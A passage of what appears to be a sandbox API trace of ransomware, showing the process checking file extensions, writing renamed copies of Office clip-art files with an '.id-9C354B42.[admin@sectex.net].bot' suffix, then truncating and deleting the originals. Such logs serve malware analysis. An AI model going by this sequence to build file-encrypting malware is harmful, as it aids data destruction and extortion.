	[0145.947] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0145.947] lstrlenW (lpString=".docx") returned 5
	[0145.947] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0145.947] lstrlenW (lpString=".pdf") returned 4
	[0145.947] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0145.947] lstrlenW (lpString=".xls") returned 4
	[0145.947] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0145.947] lstrlenW (lpString=".xlsx") returned 5
	[0145.947] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0145.947] lstrlenW (lpString=".ppt") returned 4
	[0145.947] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0145.947] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00297_.WMF") returned 63
	[0145.947] lstrlenW (lpString=".zip") returned 4
	[0145.947] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0145.947] lstrlenW (lpString=".rar") returned 4
	[0145.947] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0145.947] lstrlenW (lpString=".bz2") returned 4
	[0145.947] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0145.947] lstrlenW (lpString=".7z") returned 3
	[0145.947] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0145.947] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00297_.WMF") returned 63
	[0145.947] lstrlenW (lpString=".dbf") returned 4
	[0145.947] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0145.947] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00297_.WMF") returned 63
	[0145.948] lstrlenW (lpString=".1cd") returned 4
	[0145.948] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0145.948] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00297_.WMF") returned 63
	[0145.948] lstrlenW (lpString=".jpg") returned 4
	[0145.948] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0145.948] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0145.948] lstrlenW (lpString="FD00382_.WMF") returned 12
	[0145.948] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00382_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00382_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0145.948] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=8424) returned 1
	[0145.948] CloseHandle (hObject=0x3a0) returned 1
	[0145.948] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00382_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00382_.wmf")) returned 0x20
	[0145.948] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00382_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00382_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0145.949] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00382_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00382_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0145.949] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.949] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.949] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00382_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00382_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0145.949] GetLastError () returned 0x0
	[0145.949] ReadFile (in: hFile=0x3a0, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x20e8, lpOverlapped=0x0) returned 1
	[0145.962] WriteFile (in: hFile=0x3d4, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x20f0, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x20f0, lpOverlapped=0x0) returned 1
	[0145.963] ReadFile (in: hFile=0x3a0, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0145.963] WriteFile (in: hFile=0x3d4, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0145.963] SetEndOfFile (hFile=0x3d4) returned 1
	[0145.964] CloseHandle (hObject=0x3d4) returned 1
	[0145.964] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.964] SetEndOfFile (hFile=0x3a0) returned 1
	[0145.966] CloseHandle (hObject=0x3a0) returned 1
	[0145.966] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00382_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0145.966] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00382_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00382_.wmf")) returned 1
	[0145.967] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00382_.WMF") returned 63
	[0145.967] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00382_.WMF") returned 63
	[0145.967] lstrlenW (lpString=".doc") returned 4
	[0145.967] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0145.967] lstrlenW (lpString=".docx") returned 5
	[0145.967] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0145.967] lstrlenW (lpString=".pdf") returned 4
	[0145.967] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0145.967] lstrlenW (lpString=".xls") returned 4
	[0145.967] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0145.967] lstrlenW (lpString=".xlsx") returned 5
	[0145.967] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0145.967] lstrlenW (lpString=".ppt") returned 4
	[0145.967] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0145.967] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00382_.WMF") returned 63
	[0145.967] lstrlenW (lpString=".zip") returned 4
	[0145.967] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0145.967] lstrlenW (lpString=".rar") returned 4
	[0145.967] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0145.967] lstrlenW (lpString=".bz2") returned 4
	[0145.967] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0145.967] lstrlenW (lpString=".7z") returned 3
	[0145.967] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0145.967] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00382_.WMF") returned 63
	[0145.967] lstrlenW (lpString=".dbf") returned 4
	[0145.967] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0145.967] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00382_.WMF") returned 63
	[0145.967] lstrlenW (lpString=".1cd") returned 4
	[0145.967] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0145.968] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00382_.WMF") returned 63
	[0145.968] lstrlenW (lpString=".jpg") returned 4
	[0145.968] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0145.968] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00382_.WMF") returned 63
	[0145.968] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00382_.WMF") returned 63
	[0145.968] lstrlenW (lpString=".doc") returned 4
	[0145.968] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0145.968] lstrlenW (lpString=".docx") returned 5
	[0145.968] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0145.968] lstrlenW (lpString=".pdf") returned 4
	[0145.968] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0145.968] lstrlenW (lpString=".xls") returned 4
	[0145.968] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0145.968] lstrlenW (lpString=".xlsx") returned 5
	[0145.968] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0145.968] lstrlenW (lpString=".ppt") returned 4
	[0145.968] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0145.968] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00382_.WMF") returned 63
	[0145.968] lstrlenW (lpString=".zip") returned 4
	[0145.968] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0145.968] lstrlenW (lpString=".rar") returned 4
	[0145.968] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0145.968] lstrlenW (lpString=".bz2") returned 4
	[0145.968] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0145.968] lstrlenW (lpString=".7z") returned 3
	[0145.968] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0145.968] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00382_.WMF") returned 63
	[0145.968] lstrlenW (lpString=".dbf") returned 4
	[0145.968] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0145.968] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00382_.WMF") returned 63
	[0145.968] lstrlenW (lpString=".1cd") returned 4
	[0145.968] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0145.968] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00382_.WMF") returned 63
	[0145.969] lstrlenW (lpString=".jpg") returned 4
	[0145.969] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0145.969] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0145.969] lstrlenW (lpString="FD00403_.WMF") returned 12
	[0145.969] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00403_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00403_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0145.969] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=7878) returned 1
	[0145.969] CloseHandle (hObject=0x3a0) returned 1
	[0145.969] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00403_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00403_.wmf")) returned 0x20
	[0145.969] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00403_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00403_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0145.970] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00403_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00403_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0145.970] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.970] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.970] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00403_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00403_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0146.472] GetLastError () returned 0x0
	[0146.473] ReadFile (in: hFile=0x3a0, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x1ec6, lpOverlapped=0x0) returned 1
	[0146.475] WriteFile (in: hFile=0x3ac, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x1ed0, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x1ed0, lpOverlapped=0x0) returned 1
	[0146.476] ReadFile (in: hFile=0x3a0, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0146.476] WriteFile (in: hFile=0x3ac, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0146.476] SetEndOfFile (hFile=0x3ac) returned 1
	[0146.476] CloseHandle (hObject=0x3ac) returned 1
	[0146.476] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0146.476] SetEndOfFile (hFile=0x3a0) returned 1
	[0146.478] CloseHandle (hObject=0x3a0) returned 1
	[0146.478] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00403_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0146.479] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00403_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00403_.wmf")) returned 1
	[0146.479] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00403_.WMF") returned 63
	[0146.479] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00403_.WMF") returned 63
	[0146.479] lstrlenW (lpString=".doc") returned 4
	[0146.479] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0146.479] lstrlenW (lpString=".docx") returned 5
	[0146.479] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0146.480] lstrlenW (lpString=".pdf") returned 4
	[0146.480] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0146.480] lstrlenW (lpString=".xls") returned 4
	[0146.480] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0146.480] lstrlenW (lpString=".xlsx") returned 5
	[0146.480] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0146.480] lstrlenW (lpString=".ppt") returned 4
	[0146.480] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0146.480] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00403_.WMF") returned 63
	[0146.480] lstrlenW (lpString=".zip") returned 4
	[0146.480] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0146.480] lstrlenW (lpString=".rar") returned 4
	[0146.480] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0146.480] lstrlenW (lpString=".bz2") returned 4
	[0146.480] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0146.480] lstrlenW (lpString=".7z") returned 3
	[0146.480] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0146.480] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00403_.WMF") returned 63
	[0146.480] lstrlenW (lpString=".dbf") returned 4
	[0146.480] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0146.480] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00403_.WMF") returned 63
	[0146.480] lstrlenW (lpString=".1cd") returned 4
	[0146.480] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0146.480] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00403_.WMF") returned 63
	[0146.480] lstrlenW (lpString=".jpg") returned 4
	[0146.480] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0146.480] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00403_.WMF") returned 63
	[0146.480] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00403_.WMF") returned 63
	[0146.480] lstrlenW (lpString=".doc") returned 4
	[0146.480] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0146.480] lstrlenW (lpString=".docx") returned 5
	[0146.481] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0146.481] lstrlenW (lpString=".pdf") returned 4
	[0146.481] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0146.481] lstrlenW (lpString=".xls") returned 4
	[0146.481] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0146.481] lstrlenW (lpString=".xlsx") returned 5
	[0146.481] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0146.481] lstrlenW (lpString=".ppt") returned 4
	[0146.481] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0146.481] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00403_.WMF") returned 63
	[0146.481] lstrlenW (lpString=".zip") returned 4
	[0146.481] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0146.481] lstrlenW (lpString=".rar") returned 4
	[0146.481] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0146.481] lstrlenW (lpString=".bz2") returned 4
	[0146.481] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0146.481] lstrlenW (lpString=".7z") returned 3
	[0146.481] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0146.481] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00403_.WMF") returned 63
	[0146.481] lstrlenW (lpString=".dbf") returned 4
	[0146.481] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0146.481] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00403_.WMF") returned 63
	[0146.481] lstrlenW (lpString=".1cd") returned 4
	[0146.481] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0146.481] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00403_.WMF") returned 63
	[0146.481] lstrlenW (lpString=".jpg") returned 4
	[0146.481] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0146.482] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0146.482] lstrlenW (lpString="FD00414_.WMF") returned 12
	[0146.482] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00414_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00414_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0146.484] GetFileSizeEx (in: hFile=0x3a0, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=11002) returned 1
	[0146.484] CloseHandle (hObject=0x3a0) returned 1
	[0146.484] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00414_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00414_.wmf")) returned 0x20
	[0146.484] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00414_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00414_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0146.485] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00414_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00414_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0
	[0146.485] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0146.485] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0146.485] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00414_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00414_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0146.485] GetLastError () returned 0x0
	[0146.485] ReadFile (in: hFile=0x3a0, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x2afa, lpOverlapped=0x0) returned 1
	[0146.487] WriteFile (in: hFile=0x3ac, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x2b00, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x2b00, lpOverlapped=0x0) returned 1
	[0146.488] ReadFile (in: hFile=0x3a0, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0146.488] WriteFile (in: hFile=0x3ac, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0146.488] SetEndOfFile (hFile=0x3ac) returned 1
	[0146.488] CloseHandle (hObject=0x3ac) returned 1
	[0146.489] SetFilePointerEx (in: hFile=0x3a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0146.489] SetEndOfFile (hFile=0x3a0) returned 1
	[0146.491] CloseHandle (hObject=0x3a0) returned 1
	[0146.491] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00414_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0146.492] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00414_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00414_.wmf")) returned 1
	[0146.492] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00414_.WMF") returned 63
	[0146.492] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00414_.WMF") returned 63
	[0146.492] lstrlenW (lpString=".doc") returned 4
	[0146.492] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0146.492] lstrlenW (lpString=".docx") returned 5
	[0146.492] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0146.492] lstrlenW (lpString=".pdf") returned 4
	[0146.492] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0146.492] lstrlenW (lpString=".xls") returned 4
	[0146.492] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0146.492] lstrlenW (lpString=".xlsx") returned 5
	[0146.492] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0146.492] lstrlenW (lpString=".ppt") returned 4
	[0146.492] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0146.492] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00414_.WMF") returned 63
	[0146.492] lstrlenW (lpString=".zip") returned 4
	[0146.492] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0146.493] lstrlenW (lpString=".rar") returned 4
	[0146.493] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0146.493] lstrlenW (lpString=".bz2") returned 4
	[0146.493] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0146.493] lstrlenW (lpString=".7z") returned 3
	[0146.493] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0146.493] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00414_.WMF") returned 63
	[0146.493] lstrlenW (lpString=".dbf") returned 4
	[0146.493] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0146.493] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00414_.WMF") returned 63
	[0146.493] lstrlenW (lpString=".1cd") returned 4
	[0146.493] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0146.493] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00414_.WMF") returned 63
	[0146.493] lstrlenW (lpString=".jpg") returned 4
	[0146.493] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0146.493] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00414_.WMF") returned 63
	[0146.493] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00414_.WMF") returned 63
	[0146.493] lstrlenW (lpString=".doc") returned 4
	[0146.493] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0146.493] lstrlenW (lpString=".docx") returned 5
	[0146.493] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0146.493] lstrlenW (lpString=".pdf") returned 4
